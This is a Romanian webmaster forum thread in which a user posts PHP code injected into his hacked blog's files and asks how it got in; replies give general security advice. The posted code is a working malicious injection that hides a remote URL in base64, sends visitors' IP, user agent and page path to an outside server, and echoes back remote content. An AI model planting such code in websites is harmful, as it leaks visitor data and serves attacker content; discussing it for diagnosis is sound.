Rezultate 1 la 7 din 7

Subiect: Virus in base64

Afișare hibrid

  1. #1
    Avatarul lui Realtuning
    Realtuning este deconectat Junior SeoPedia
    Reputatie:
    0
    Data înscrierii
    25th January 2011
    Locaţie
    Nadrag
    Vârstă
    36
    Posturi
    128
    Putere Rep
    0


    Implicit Virus in base64

    Astazi m-am trezit cu blogul virusat si umplut prin index.php, pages.php si footer.php cu un cod strain, iar atributele folderelor au fost schimbate din 644 in 777.

    Stie cineva ceva despre acest cod:

    <?php
    if (!isset($sRetry))
    {
    global $sRetry;
    $sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
    if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
    $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQuc Ghw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainnam e='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
    @$stCurlHandle = curl_init( $stCurlLink );
    }
    }
    if ( $stCurlHandle !== NULL )
    {
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
    {$sResult[0]=" ";
    echo $sResult; // Statistic code end
    }
    curl_close($stCurlHandle);
    }
    }
    ?>
    Stie cineva care este portita prin care se strecoara?PS: nu numai la wordpress, ci si la alte platforme cu e php fusion si altele s-a strecurat. A mai patit cineva asta?

  2. #2
    Avatarul lui haos
    haos este deconectat Ambasador
    Reputatie:
    63
    Data înscrierii
    19th February 2008
    Locaţie
    Craiova
    Posturi
    2.239
    Putere Rep
    63


    Implicit

    Se discuta chestia asta pe mai multe threaduri. Daca o sa te uiti, sunt usor de gasit. Nu exista un raspuns general valabil dar cauza este peste tot aceeasi, o securizare slaba. Pentru wordpress, ajuta-te de WordFence, pentru alte platforme, vezi cum si-au mai securizat si altii siteurile pe platformele respective. Daca ai un buget cat de mic pentru capitolul securitate, da-mi un mesaj si vedem ce putem face.
    Citeste primul meu curs SEO - principii de baza. Vezi oferta mea de advertoriale PR5.

  3. #3
    Avatarul lui kleampa
    kleampa este deconectat Ambasador
    Reputatie:
    54
    Data înscrierii
    31st May 2006
    Locaţie
    Bucuresti
    Vârstă
    37
    Posturi
    1.598
    Putere Rep
    54


    Implicit

    daca esti pe hosting shared, problema e posibil sa fie la oricare din ceilalti clienti hostati pe serverul respectiv.

  4. #4
    Avatarul lui felix
    felix este deconectat Membru SeoPedia
    Reputatie:
    45
    Data înscrierii
    30th November 2010
    Locaţie
    Baia Mare
    Vârstă
    52
    Posturi
    1.344
    Putere Rep
    45


    1 out of 1 members found this post helpful.

    Implicit

    Problema blogurilor neactualizate, ar fii bun un topic separat cu sfaturi si plugin-uri pentru securizare WP.
    Studiu de caz pentru un magazin online, FashionLand, Bld, Bulevardul Regele Mihai I 55, Baia Mare 430012

  5. #5
    Avatarul lui haos
    haos este deconectat Ambasador
    Reputatie:
    63
    Data înscrierii
    19th February 2008
    Locaţie
    Craiova
    Posturi
    2.239
    Putere Rep
    63


    Implicit

    Citat Postat în original de felix Vezi Post
    Problema blogurilor neactualizate, ar fii bun un topic separat cu sfaturi si plugin-uri pentru securizare WP.
    Ti-am dat un like pentru replica asta, pentru ca asa este.. Se deschid prea multe topicuri pe acelasi subiect in mod repetat si in final problema de baza tot nu se rezolva. As fi scris eu un articol despre asta dar din pacate nu mai am timp pentru a scrie atat de detaliat pe cat merita tratat acest subiect.
    Citeste primul meu curs SEO - principii de baza. Vezi oferta mea de advertoriale PR5.

  6. #6
    Avatarul lui felix
    felix este deconectat Membru SeoPedia
    Reputatie:
    45
    Data înscrierii
    30th November 2010
    Locaţie
    Baia Mare
    Vârstă
    52
    Posturi
    1.344
    Putere Rep
    45


    Implicit

    Mersi de +, chiar ar fii bine venit un topic cu aceste probleme, dupa ce am vazut problemele pe forum ale colegiilor, ieri mi-am actulizat toate wp-urile, le-am scos versiunea sa nu mai poata fii accesata si mi-am instalat un plugins de back-ul pe care il poti seta sa faca back-up periodic pentru a scapa de surprize. Ma gandesc ca ar mai fii si altele......
    Studiu de caz pentru un magazin online, FashionLand, Bld, Bulevardul Regele Mihai I 55, Baia Mare 430012

  7. #7
    Avatarul lui haos
    haos este deconectat Ambasador
    Reputatie:
    63
    Data înscrierii
    19th February 2008
    Locaţie
    Craiova
    Posturi
    2.239
    Putere Rep
    63


    Implicit

    E bine ca ai luat masuri, dar astea sunt sub 1% din totalul de masuri de securitate. Printre altele, dupa cum spune si Kleampa, si compania de hosting are rolul ei, pentru ca daca infectia provine de la conturile vecine de hosting, nu prea te poti proteja. E bine ca faci backup, asta o sa te scape de multe dureri de cap.
    Citeste primul meu curs SEO - principii de baza. Vezi oferta mea de advertoriale PR5.

Informații subiect

Utilizatori care navighează în acest subiect

Momentan este/sunt 1 utilizator(i) care navighează în acest subiect. (0 membrii și 1 vizitatori)

Thread-uri Similare

  1. Google si indexarea imaginile encodate in base64
    De deadworldisee în forumul Google
    Răspunsuri: 8
    Ultimul Post: 24th August 2010, 02:50
  2. virus sau hack?
    De prodan_13 în forumul Client side
    Răspunsuri: 21
    Ultimul Post: 5th June 2009, 15:59
  3. Virus PC
    De style în forumul Bar, lobby...
    Răspunsuri: 2
    Ultimul Post: 15th October 2007, 23:32
  4. Virus Pe Site
    De style în forumul Bar, lobby...
    Răspunsuri: 4
    Ultimul Post: 12th October 2007, 14:14
  5. Virus prin YM
    De Cristian Mezei în forumul Bar, lobby...
    Răspunsuri: 11
    Ultimul Post: 22nd November 2006, 16:25

Permisiuni postare

  • Nu puteţi posta subiecte noi.
  • Nu puteţi răspunde la subiecte
  • Nu puteţi adăuga ataşamente
  • Nu puteţi modifica posturile proprii
  •